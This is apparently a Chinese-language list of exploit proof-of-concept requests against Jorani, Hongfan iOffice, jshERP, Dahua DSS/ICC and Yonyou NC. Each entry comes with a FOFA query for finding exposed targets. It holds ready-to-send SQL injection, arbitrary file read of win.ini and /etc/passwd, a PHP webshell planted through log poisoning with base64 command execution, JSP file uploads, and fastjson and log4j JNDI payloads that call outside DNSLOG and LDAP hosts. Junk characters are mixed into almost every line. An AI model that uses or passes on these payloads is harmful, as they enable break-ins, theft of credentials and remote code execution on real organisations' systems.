" X7 c' }! g6 S8 e+ r# \GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
/ S+ |2 j9 {3 ]$ R- sHost: 127.0.0.1
! J" X( `8 h( ?6 H, dPragma: no-cache3 c4 f8 i2 \9 d" o
Cache-Control: no-cache
: f8 D5 z& r i& x* \Upgrade-Insecure-Requests: 1
0 N# r4 f. g0 OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.369 z% Z0 I0 j G& i" w2 \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 P* r0 E. {$ k% u7 ?
Accept-Encoding: gzip, deflate8 [" Y7 ~' s* u0 D, [4 ^" T
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8* _1 u- u$ C [4 L* ]
Connection: close
) I, o+ T. K4 e5 n8 n a+ ?9 K! s5 G6 B7 h7 V! y
9 P/ m9 G6 A' d: V. y12. Jorani < 1.0.2 远程命令执行
; I6 u! `8 n0 j4 Z0 }FOFA:title="Jorani"
7 ?* H1 p: N" m! J/ k第一步先拿到cookie+ B `" ]3 B ~ _
GET /session/login HTTP/1.1
! Y* u( B# [( v1 U/ n) s( x/ fHost: 192.168.190.30
" i, _! ~ }" J; f) M3 WUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
% v- w. i6 s# r1 @3 l% WConnection: close
3 t/ O) y4 d7 SAccept-Encoding: gzip
7 A' e( u# m* }9 `# U b# N
; |/ d s0 L8 g, J/ y
) B$ B" N: H% z4 k$ _5 e响应中csrf_cookie_jorani用于后续请求
1 c5 f9 I! ?- I! aHTTP/1.1 200 OK g; |: D$ q. R8 b5 K/ A2 s
Connection: close! ~* @& B+ f3 M' |+ p
Cache-Control: no-store, no-cache, must-revalidate+ Q) T4 V* N- C4 S2 a9 h6 V; N& k
Content-Type: text/html; charset=UTF-81 L7 g+ S/ n- z9 m- j9 @9 q8 B3 P
Date: Tue, 24 Oct 2023 09:34:28 GMT6 R5 E6 a0 e+ h+ {( C
Expires: Thu, 19 Nov 1981 08:52:00 GMT
' ]/ [ a/ u3 r, jLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT
5 A3 D. e9 x6 u( ^Pragma: no-cache
7 a$ G. B% V3 f+ [$ a& p- gServer: Apache/2.4.54 (Debian)
+ B7 L% ]' R1 s% y8 f, _: A, tSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
1 R; e4 R8 b' R N% y- x( hSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly, c$ d/ q; k+ H" W- @3 `, }0 i
Vary: Accept-Encoding, |: o8 \9 L$ X6 u
! p! A+ y% N7 ^- X7 W0 [. `
' X+ o! W1 i2 ]/ y) qPOST请求,执行函数并进行base64编码
- ~* S% j8 N) v9 q% H4 x) r% PPOST /session/login HTTP/1.15 f" X) k) o/ J8 |1 G2 G3 i
Host: 192.168.190.30
. O6 I7 j" X5 L1 LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
! |0 q9 I( [9 w7 iConnection: close( A0 R6 O8 D/ J& m3 A2 x% C
Content-Length: 252& A9 [" z: ~: U$ N
Content-Type: application/x-www-form-urlencoded
( s. e' U2 g& M6 dCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
* g. t+ l6 U" H; wAccept-Encoding: gzip
4 ?: ~8 B P% z4 C8 Q4 B5 v0 l4 X% J1 R) L
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
0 t" _) Z& d3 t/ A
R* r: L! ~& L5 T" ?3 a; j& d9 U
. E' M$ e7 p# D2 i3 Z% M9 ^0 B) `4 m
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
" T, x, `# ^0 \GET /pages/view/log-2023-10-24 HTTP/1.19 V: O' `/ j8 O _8 [
Host: 192.168.190.300 g1 A U& N# h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.362 c5 Y, `' ^% x$ p0 y# d- f- k
Connection: close: u! i( `9 e5 z% p" t% s: H7 l
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
) I3 `6 g1 H0 _& g; pK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=- z: L* a+ B/ _& z" Q C
X-REQUESTED-WITH: XMLHttpRequest
$ K. g! h% I5 s' Q) c9 l' z. w7 }Accept-Encoding: gzip
+ m1 @# B8 u8 @$ D2 }1 E' T# S" Y* D1 a
/ X# f( f$ N6 M. u$ Z/ U4 [
13. 红帆iOffice ioFileDown任意文件读取
' a" H* d* {7 y [4 k0 s9 SFOFA:app="红帆-ioffice"
" Y' R3 Z% f; G& P* {" \/ nGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
3 S) b) w4 Y" Q* o/ YHost: x.x.x.x
; w0 d% w4 ^( d. kUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
( v y* M" Q8 I- oConnection: close
: Y2 ]3 r2 m5 |, UAccept: */*& ~1 B' u' d) j& G2 s/ d9 \6 E6 w
Accept-Encoding: gzip6 D# u* c: p. o; K
0 Y8 `1 V" z. L
) q4 J, ~; ^( Q' k, t14. 华夏ERP(jshERP)敏感信息泄露6 g' r: P( x. J: G8 |. ~2 d; n( }$ w
FOFA:body="jshERP-boot", G; [; V; C6 a0 P1 P" `
泄露内容包括用户名密码, m6 j# w+ t" k5 E N( [# D
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
9 K9 P( X9 I6 t* J4 M" HHost: x.x.x.x) P& ]; G- {$ d9 k" R
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
2 ]- C( ?" x' }. f! t" }3 r% f% HConnection: close
! T$ V6 T/ s" m1 H; ]) FAccept: */*
) y- y8 g, k: q0 b5 _Accept-Language: en
% q& c: K% T' c+ k; W3 WAccept-Encoding: gzip
; m g; ]$ @) ~+ T; c
6 S8 W5 k2 M8 H1 Q. U- G9 k/ F! b" S' K2 V
15. 华夏ERP getAllList信息泄露4 Q# j/ a# Q8 e/ i+ v4 o
CVE-2024-0490& a$ w% h9 G* s& U3 j
FOFA:body="jshERP-boot", g; Y% M4 N: K" r7 E5 f+ t; L
泄露内容包括用户名密码
& U+ @# v; [) z# h/ CGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
9 }7 r8 a+ e* p; ` I2 q" pHost: 192.168.40.130:100" M1 Q8 k9 l; h; x+ d* S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36# ?1 l! t; u; W. N% r2 I
Connection: close6 k$ I% X5 Y! `( H. O/ }. p* C
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8# _0 W0 G7 V6 r& P( g( W
Accept-Language: en
( Y/ x8 ?& B* z& O( P; bsec-ch-ua-platform: Windows
: l/ F) X" T% d6 j# ~1 `. _% W. hAccept-Encoding: gzip
$ Q! `; \- b* |( g+ W
1 \5 Z: L0 e) F* G' }2 O! L: R0 `% s! t9 s ]
16. 红帆HFOffice医微云SQL注入% v6 H( b% W# _" r
FOFA:title="HFOffice", H/ {6 Q, }% g$ P9 T
poc中调用函数计算1234的md5值
4 c9 ]- T- X0 M6 TGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1: S" {: |2 l( l7 v& G1 @
Host: x.x.x.x
- B9 w7 m/ Q7 f- S8 w! r* ]( SUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36; G$ T3 m8 \9 E% T
Connection: close b e' `. b+ y0 H# c/ l, ?- @* J1 \
Accept: */*
' t- p/ g3 w% |6 q# pAccept-Language: en
1 [+ n4 b u- y3 G; g! LAccept-Encoding: gzip/ j1 p8 R3 d* q
2 m2 a; f: j4 }- p. d3 m# N! T$ {
17. 大华 DSS itcBulletin SQL 注入
. H3 ?( t* ^( m- BFOFA:app="dahua-DSS"7 e& N0 f& W4 L# f! j
POST /portal/services/itcBulletin?wsdl HTTP/1.1+ @2 b2 [/ R' g; L( A& m" _. H
Host: x.x.x.x
6 g5 {- I6 ]' F9 ^+ ?User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 l1 Q' H3 |4 J$ A9 m7 oConnection: close
) I8 D F# a; ?3 l; A. S1 F2 HContent-Length: 345
7 [* d9 C5 U: y% Y, ]4 IAccept-Encoding: gzip
; `4 @% _: Q) \( n& U
' y1 o& l9 b$ @9 \2 A* {0 z<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
9 j( e r. b' `: q2 @2 X<s11:Body>
( p: w* N0 m8 G1 Q+ H, b <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
2 `4 q7 F+ [+ s( x4 f4 Y; G E <netMarkings>* _7 e0 m: E7 |5 k3 ^7 S% R
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
7 z- ^9 ?6 p- v8 a# z/ O </netMarkings>+ j. A3 I' W$ Z- \+ D6 ?
</ns1:deleteBulletin>. t' S0 q t r# s1 O' S
</s11:Body>9 R. d0 J8 P7 K- U% l5 t
</s11:Envelope>
Y" m6 E' |8 l9 N; ]3 Y A& Z7 T; v
( n2 N& `! w; \( T K
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
/ v5 k: C3 w( X# _+ cFOFA:app="dahua-DSS"
( N0 I3 _7 U$ [GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
/ V7 F! Y: B m) A9 m, m! rHost: your-ip
! v! T ~! U, a2 I8 D" z9 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 a5 M2 ]$ D% `& n1 D) Q. Z) o; S# n1 T
Accept-Encoding: gzip, deflate- x5 k! U- Q, L" W6 |
Accept: */*
1 z9 H8 L7 k4 A4 CConnection: keep-alive
( V* ?/ v; L- |
6 X" C: @, d$ _6 ?! g+ a% o# P- {) ^" W6 n0 u3 }
, R! u9 Y1 G" F8 m) v+ }5 l
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入% ~ N- {8 V9 M
FOFA:app="dahua-DSS"
) p! i2 ?7 [( R) ]GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
! I; D0 {1 O8 t9 iHost:
( J" h, q9 s& MUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
1 W* r2 _. W& E3 D7 lAccept-Encoding: gzip, deflate. m3 q" K5 i" k) e( Z, f
Accept: */*% D0 i: \. h$ l: ^7 A/ H9 C# Y' L
Connection: keep-alive
! S; H% t% N* y4 ~6 k% i1 A5 i2 F2 }; W0 {( ?6 c6 _! |" v! d: }
/ n/ R) Y7 K9 \. d& a- W, c- x
20. 大华ICC智能物联综合管理平台任意文件读取' v; B' F: g" x1 \/ y
FOFA:body="*客户端会小于800*"6 j% B9 K/ j/ p
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1* X! H) I& u$ g; L8 l) [1 {
Host: x.x.x.x9 E/ K8 Z! k" L2 z
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36+ n( M5 ]9 F; k, w ]8 f
Connection: close* Z( b+ G0 k. v! H# S
Accept: */*% n2 I5 E$ ]; R. u; x$ ~
Accept-Language: en
: |6 }# t4 I' ?+ ?1 _; v, FAccept-Encoding: gzip
5 B$ i3 Z: M/ V* D$ R1 Z" C7 j
5 j1 Z3 r6 n$ t0 V1 D' D
- }0 C g. P7 x9 J- ]1 Z: b9 v2 ^21. 大华ICC智能物联综合管理平台random远程代码执行1 I: h G2 [% z4 H
FOFA:icon_hash="-1935899595"1 t& e' O1 r! i- |+ Y" r: Z& v3 }( [
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
3 j# G; f" M# X& R! R/ gHost: x.x.x.x
6 ~) ]+ g8 T5 B9 oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 m A0 b; | }0 H1 t
Content-Length: 161. I* I4 b+ v7 x. A/ @. [- M3 Q
Accept-Encoding: gzip0 a* q# I6 F( w; q! ]- m0 w
Connection: close
/ \$ j3 P. Y8 l8 a9 x5 H9 l3 ]Content-Type: application/json;charset=utf-8
) b ^7 D* I8 T; l( d/ L4 f: S* |/ R9 R; M% Z9 w
{9 r! ]( E$ ?0 P' f9 d4 _1 A
"a":{! r o6 b5 O1 I1 U1 ]0 u
"@type":"com.alibaba.fastjson.JSONObject",
$ [+ _7 C9 K: C" a7 A# d7 c2 R* U! E {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
) C2 x7 H3 |0 d2 j9 F }"" r' g1 E' R; K# o
}
2 M- X% Y5 v+ H; `7 l# f
- ?. W+ Z' S' N4 {+ b( m
6 {. m, m6 r2 {& B" O22. 大华ICC智能物联综合管理平台 log4j远程代码执行. K2 }: C% j9 _5 E9 A4 O
FOFA:icon_hash="-1935899595"3 c. y9 r+ @/ i1 N) b
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1. B, q4 p; E8 B3 s! S% y& J: p( P
Host: your-ip
[! w% N3 C, jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.361 J; C3 S. M+ z! \1 p- @
Content-Type: application/json;charset=utf-8) s. A W3 A U
: a# a1 Z- r" s2 L, l3 h& {8 Q
{
6 s. F+ W% N2 a, ^6 }"loginName":"${jndi:ldap://dnslog}"7 W# l0 b# k" Z) y% E2 H/ y
}, H. `" Z4 ~- f# T
* h- s7 \9 D8 J- W q! d9 T v1 C. M9 E4 d9 ^
* {& \8 f" p2 d; x1 c0 _8 I23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
/ ` s9 F; g2 ]( zFOFA:icon_hash="-1935899595"
2 l/ A: m" J+ O# g6 l' iPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1- [0 U6 _ t- f$ J
Host: your-ip0 l- f8 U6 Z" Q$ o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* O! m7 s$ `+ Z- f+ M/ ^* j+ i$ e$ BContent-Type: application/json;charset=utf-8' N' ~$ N( T$ ]$ G, E1 n
Accept-Encoding: gzip
1 }' A4 U6 C! b" y1 B) NConnection: close z% ~. t* P9 A& u
: G3 U8 j: N' p* l" @; L0 A7 }; U
{
/ E& M5 j* _% r% g( a+ `* p "a":{( a3 g, _9 C0 m9 g
"@type":"com.alibaba.fastjson.JSONObject",& c9 V+ W: }. n1 C2 G: H
{"@type":"java.net.URL","val":"http://DNSLOG"}
0 B& a6 ~/ G0 x0 W) z: u h }""
+ s. b3 c5 q% B# {6 s" {& o}5 q7 W4 }+ c, ?6 d) O n
1 Y% N$ |6 g& M. j
* B- Y( p. z4 R4 B6 h8 N24. 用友NC 6.5 accept.jsp任意文件上传
; Q I5 C, K t: V( R' KFOFA:icon_hash="1085941792"6 s4 z$ {* B$ x0 f$ F
POST /aim/equipmap/accept.jsp HTTP/1.1
( m# R* L% w+ I' t5 m o/ n) uHost: x.x.x.x/ e2 K7 o! I9 N( P r# q" ~
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36( [+ n% ~1 k/ R% R; r2 g' v; w8 {
Connection: close1 I9 H5 \$ D8 f- h, b* S( O: D
Content-Length: 449
8 U% O3 Z; h5 |* }! RAccept: */*
+ b, s. i: \; u* U- b) d1 ^- ^Accept-Encoding: gzip" d3 H3 R D4 B7 q, d
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
6 f2 J8 a4 Q( w( a. U) l! E, o: q G: j4 P9 z" t7 U# l4 q
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
0 \6 V( P, r4 F% S: b- A1 TContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"4 ]; ]/ _/ {" M/ V* E) e2 m- a6 h
Content-Type: text/plain9 u) L8 U; ^5 G3 {: F7 }( q1 U2 O; \
; F$ D" u5 ?. M' |& L<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
& {) D' O2 N: s. o3 i-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc5 I3 b) u5 [) Q$ O
Content-Disposition: form-data; name="fname"
% O8 e7 c# {2 J7 T3 h& ^" n% G7 ~" u$ P$ c0 w! w, ^8 U+ @$ e
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
k; V) ?1 U5 ]9 R. @# `0 h$ d-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
/ d6 u0 j v. s" D, h1 Q/ n* I# k5 C- k0 f
4 w) O. Q! S' J4 O+ ?25. 用友NC registerServlet JNDI 远程代码执行4 f6 l1 m+ n' \4 k6 V, L
FOFA:app="用友-UFIDA-NC"
4 X# c) U9 {; g1 ^- hPOST /portal/registerServlet HTTP/1.1
9 Q' `9 F: h7 s; k, K9 w5 F$ EHost: your-ip" b- ] `+ k; _. x5 U' Y* U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Q0 S3 s5 ^9 LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9. U% `9 B; Z+ G- w% c" |3 Z4 M# l
Accept-Encoding: gzip, deflate
9 I2 ?: }3 u2 }1 b( zAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
2 V! l+ I2 B1 B- o( b$ i& s: jContent-Type: application/x-www-form-urlencoded
& j X, U& {! U. `! l
, A# S/ K& t/ vtype=1&dsname=ldap://dnslog
" M. f S5 K8 {. ], b( L. r
" r4 {/ O! s* b8 C ^0 |* m1 ^' C
0 d) f8 X! I! U- F7 d& E
1 C. ]4 C i! a$ e$ @26. 用友NC linkVoucher SQL注入! H q, h$ N/ M. r0 u$ H
FOFA:app="用友-UFIDA-NC"1 T* Z. N9 {2 U4 Y
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
# D0 j" z5 W+ V6 [" v. I/ UHost: your-ip& y- O" W9 c8 S& ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# \4 i l1 r' D* Z' U: J
Content-Type: application/x-www-form-urlencoded
+ R B' ` m' V" L# ^Accept-Encoding: gzip, deflate# b/ L O- w! I0 F6 u
Accept: */*! o, Z& ?+ F* t0 m! l* u
Connection: keep-alive
- m) x7 ]' A" u9 N( r
9 b7 P. l" {. e. D; q3 p: K) q$ \1 @. F- ]1 o! G, h) u( W; X
27. 用友 NC showcontent SQL注入
) z/ w6 |/ v' A* F0 ~+ ^FOFA:icon_hash="1085941792"
* V, J- V! c) g- x. t0 i3 qGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
( @# P: N9 \, `% F- \" ]Host: your-ip9 e0 f/ s1 T8 g! j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ ~( { M7 T) h# q. }8 S
Accept-Encoding: identity2 T1 n2 M( ?. q; d. T
Connection: close
- V1 T4 J( M: D4 E$ U5 JContent-Type: text/xml; charset=utf-8
9 s. G5 l# e$ Q( U! Y% h# E7 F" z7 s- F6 q
+ \1 o6 l) Z" {28. 用友NC grouptemplet 任意文件上传; a6 r/ |+ p' [6 E0 Z. E ^: n
FOFA:icon_hash="1085941792"
# r3 L+ c' T7 l* |. ]: ?POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1$ F5 X8 J6 |0 E, B$ h+ J! R
Host: x.x.x.x" `. y M0 [# V5 _: p* v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.364 W S F* J# T; V' v5 l
Connection: close
2 L4 v, g% B3 q* ^Content-Length: 268: g4 W5 k8 b5 k' A ]3 J# O& I3 z
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk; |. {# L% S0 L. G( m* N
Accept-Encoding: gzip
; x) N/ F i3 r& v9 d
9 x0 L( \ L' `2 w' r) S" Y, H------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk% R, @" n% [% Y
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp") X) w, L, J; W: C! q" C" F
Content-Type: application/octet-stream
@7 c- v" z; r3 w# w' J1 y7 d1 V7 F+ B) Y" [ _& r9 {" \4 _
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>" J7 F7 `: ?3 k
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--" p- C* a. K! C2 K9 W
: x+ T1 S7 }& z% W
- {$ H0 V P9 n8 N/uapim/static/pages/nc/head.jsp4 y9 p+ H" w5 E7 s
! n$ T. Q9 b/ Y- k4 W6 f/ W( ?' v& N. x9 c
29. 用友NC down/bill SQL注入
$ }9 y o6 I* ~' S5 i0 T kFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
1 j! J# q* R4 ?3 s. G3 K$ l; s; hGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.19 Z6 E7 A/ @7 Q' ` ^- V& m
Host: your-ip
( {8 H" Y5 c/ lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36& ^3 N( y' ?& |7 R3 @; N
Content-Type: application/x-www-form-urlencoded/ l3 e2 J; c! J y
Accept-Encoding: gzip, deflate
' N# ?+ I9 \% _0 oAccept: */*, I) R! G! M4 P% l2 }3 |7 i! _6 X
Connection: keep-alive
0 \* e+ B4 r S, Y! c1 o$ ^4 j- U/ V. a7 O
" m; I) [; s" @; T8 B- j
30. 用友NC importPml SQL注入
6 L8 w# X# J4 h: r3 b0 H8 TFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"6 L! C3 y( _' L% ~, B4 d
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
, N: i' G" W; D0 T9 l8 L8 SHost: your-ip& B( G, _3 ?* ]- m0 M
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
/ L4 h: C9 k/ M! f) K2 C6 w# _0 dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36, |, y1 E/ [6 A% K7 m r1 `
Connection: close n4 x1 e8 o3 `- n7 S; U0 a4 |6 l
& Q% N4 R- n" c9 ]( i6 s
------WebKitFormBoundaryH970hbttBhoCyj9V
3 d/ `$ n3 P k% i. }' ?Content-Disposition: form-data; name="Filedata"; filename="1.jpg"8 h* A6 h3 M# p. K3 K" q7 g1 y" U' b
Content-Type: image/jpeg
3 z- {/ K: U9 h, X) w t------WebKitFormBoundaryH970hbttBhoCyj9V--6 ]8 L4 s5 k+ [
* l' U, k5 Q2 R# b# R+ |: ^2 |
( E. m# }& }( d; K9 V6 N0 B5 A
31. 用友NC runStateServlet SQL注入+ w# J5 a/ U: W7 s; T5 m! L
version<=6.50 O+ |. k& a+ v) G
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"% V5 O. G- F6 t f. R6 Z
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
8 E: V: V. @& u( K) l' \$ tHost: host1 H4 e5 ]2 E& v/ c9 m5 z; T. ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
3 J" R) Q* O3 P0 d( F, B5 \Content-Type: application/x-www-form-urlencoded8 y) y9 P4 k; A9 Q$ c
j0 B7 n! S6 s+ f0 w: f8 ?. a
1 C+ M9 ~+ \( v: q
32. 用友NC complainbilldetail SQL注入
6 M+ K% E r# C; v' o u8 o0 bversion= NC633、NC651 R* |' S7 f% ]2 u* [4 |
FOFA:app="用友-UFIDA-NC"4 k l$ A( y0 L4 t( W% ?
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
# Q, Q u4 U: ]! @5 A4 HHost: your-ip
2 p' [2 p2 B# u; D7 C7 }' oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 q( L+ I3 [3 x3 NContent-Type: application/x-www-form-urlencoded! V% ?+ F& N$ j, @$ V! u
Accept-Encoding: gzip, deflate
+ q. J- l% `. l% Y0 X* I3 T; z# mAccept: */*
$ B' L* e Y0 M+ ^9 CConnection: keep-alive
4 q1 R' z0 ] Y% l, B) t
, V5 `* Z& U" U6 D1 D$ @9 @
7 T( Z& y1 X" l33. 用友NC downTax/download SQL注入& f. E1 C, [$ Y7 S" G" f9 ^+ O6 Z
version:NC6.5FOFA:app="用友-UFIDA-NC"
: V$ m5 Y4 J4 Q# d' lGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
- ~5 a, L' g$ x( u0 JHost: your-ip
+ N! B9 Q( }# q, FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
8 c- _) j8 |- _9 Y' O+ b. n( `1 }Content-Type: application/x-www-form-urlencoded$ T1 A8 _& {& P
Accept-Encoding: gzip, deflate
+ L* o& {9 {- H5 x0 l/ lAccept: */** K+ {7 c: r' N( ` O- j* b: `
Connection: keep-alive; A* v0 ^/ \9 [% s) w2 s$ Q
W o. g2 t7 r2 D# x* T+ o
; f* R( t p- U# D9 V: q+ ~34. 用友NC warningDetailInfo接口SQL注入) r! H* E% Q. s
FOFA:app="用友-UFIDA-NC"
c4 K; e! n" h \" n8 n% ^GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.15 t+ N9 o, z, q) ]0 k! U6 ]
Host: your-ip
% h) v3 y4 h }0 v) W& vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36+ @8 p( i) V, V$ Y1 @5 z9 ?
Content-Type: application/x-www-form-urlencoded
# L$ m) r: C$ i" pAccept-Encoding: gzip, deflate
9 M! A( A# ?1 mAccept: */*
3 _8 x; ^8 o* s$ ]. LConnection: keep-alive$ v- I1 R) A$ N" T
. Q; O: w% F! U; h
